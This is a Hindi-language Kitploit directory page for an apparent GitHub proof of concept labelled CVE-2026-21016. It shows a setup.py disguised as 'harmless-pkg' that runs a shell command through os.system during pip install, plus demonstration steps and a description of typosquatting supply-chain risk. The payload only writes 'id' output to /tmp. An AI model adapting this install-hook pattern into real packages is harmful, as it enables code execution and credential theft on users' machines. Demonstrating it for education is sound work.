Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution- — दर्शाता है कि कैसे एक दुर्भावनापूर्ण Python पैकेज pip install के दौरान setup.py के माध्यम से मनमाने कमांड निष्पादित करता है, जो PyPI सप्लाई चेन और typosquatting जोखिमों को उजागर करता है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-
शोषणआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षापेलोड डेवलपमेंटप्रतिकूल हमला
GitHubgeorge0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-

CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution-

दर्शाता है कि कैसे एक दुर्भावनापूर्ण Python पैकेज pip install के दौरान setup.py के माध्यम से मनमाने कमांड निष्पादित करता है, जो PyPI सप्लाई चेन और typosquatting जोखिमों को उजागर करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
17 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-21016 – दुर्भावनापूर्ण PyPI पैकेज इंस्टॉल हुक (setup.py निष्पादन)

प्रोग्राम कोड (Python)

root@kitploit:~
# setup.py - Malicious package that executes during install
from setuptools import setup
import os

# This runs on pip install
os.system('id > /tmp/pwned_by_package')

setup(
    name='harmless-pkg',
    version='1.0',
    packages=[],
)

CVE-2026-21016 – दुर्भावनापूर्ण PyPI पैकेज इंस्टॉल हुक (setup.py)

Severity: Critical

अवलोकन

एक PyPI पैकेज अपने setup.py में मनमाना कोड शामिल कर सकता है, जो pip install के दौरान निष्पादित होता है। एक हमलावर किसी लोकप्रिय पैकेज के समान नाम वाला पैकेज प्रकाशित कर सकता है (typosquatting) और स्थापना पर, पेलोड उपयोगकर्ता के विशेषाधिकारों के साथ चलता है, जिससे रिमोट कोड निष्पादन होता है।

भेद्यता विवरण

  • प्रकार: आपूर्ति श्रृंखला हमला / कोड निष्पादन
  • प्रभाव: सिस्टम से समझौता, क्रेडेंशियल चोरी।
  • मूल कारण: Pip setup.py को बिना सैंडबॉक्सिंग के निष्पादित करता है, जिससे पैकेजों को पूर्ण पहुंच मिलती है।

शोषण प्रदर्शन

  1. दिए गए setup.py के साथ दुर्भावनापूर्ण पैकेज निर्देशिका बनाएँ।
  2. इसे स्थानीय रूप से इंस्टॉल करें:
    root@kitploit:~
    pip install ./harmless-pkg
    
    
  3. आउटपुट जाँचें:
    root@kitploit:~
    cat /tmp/pwned_by_package
    

id कमांड निष्पादित किया गया।

टूल डाउनलोड करें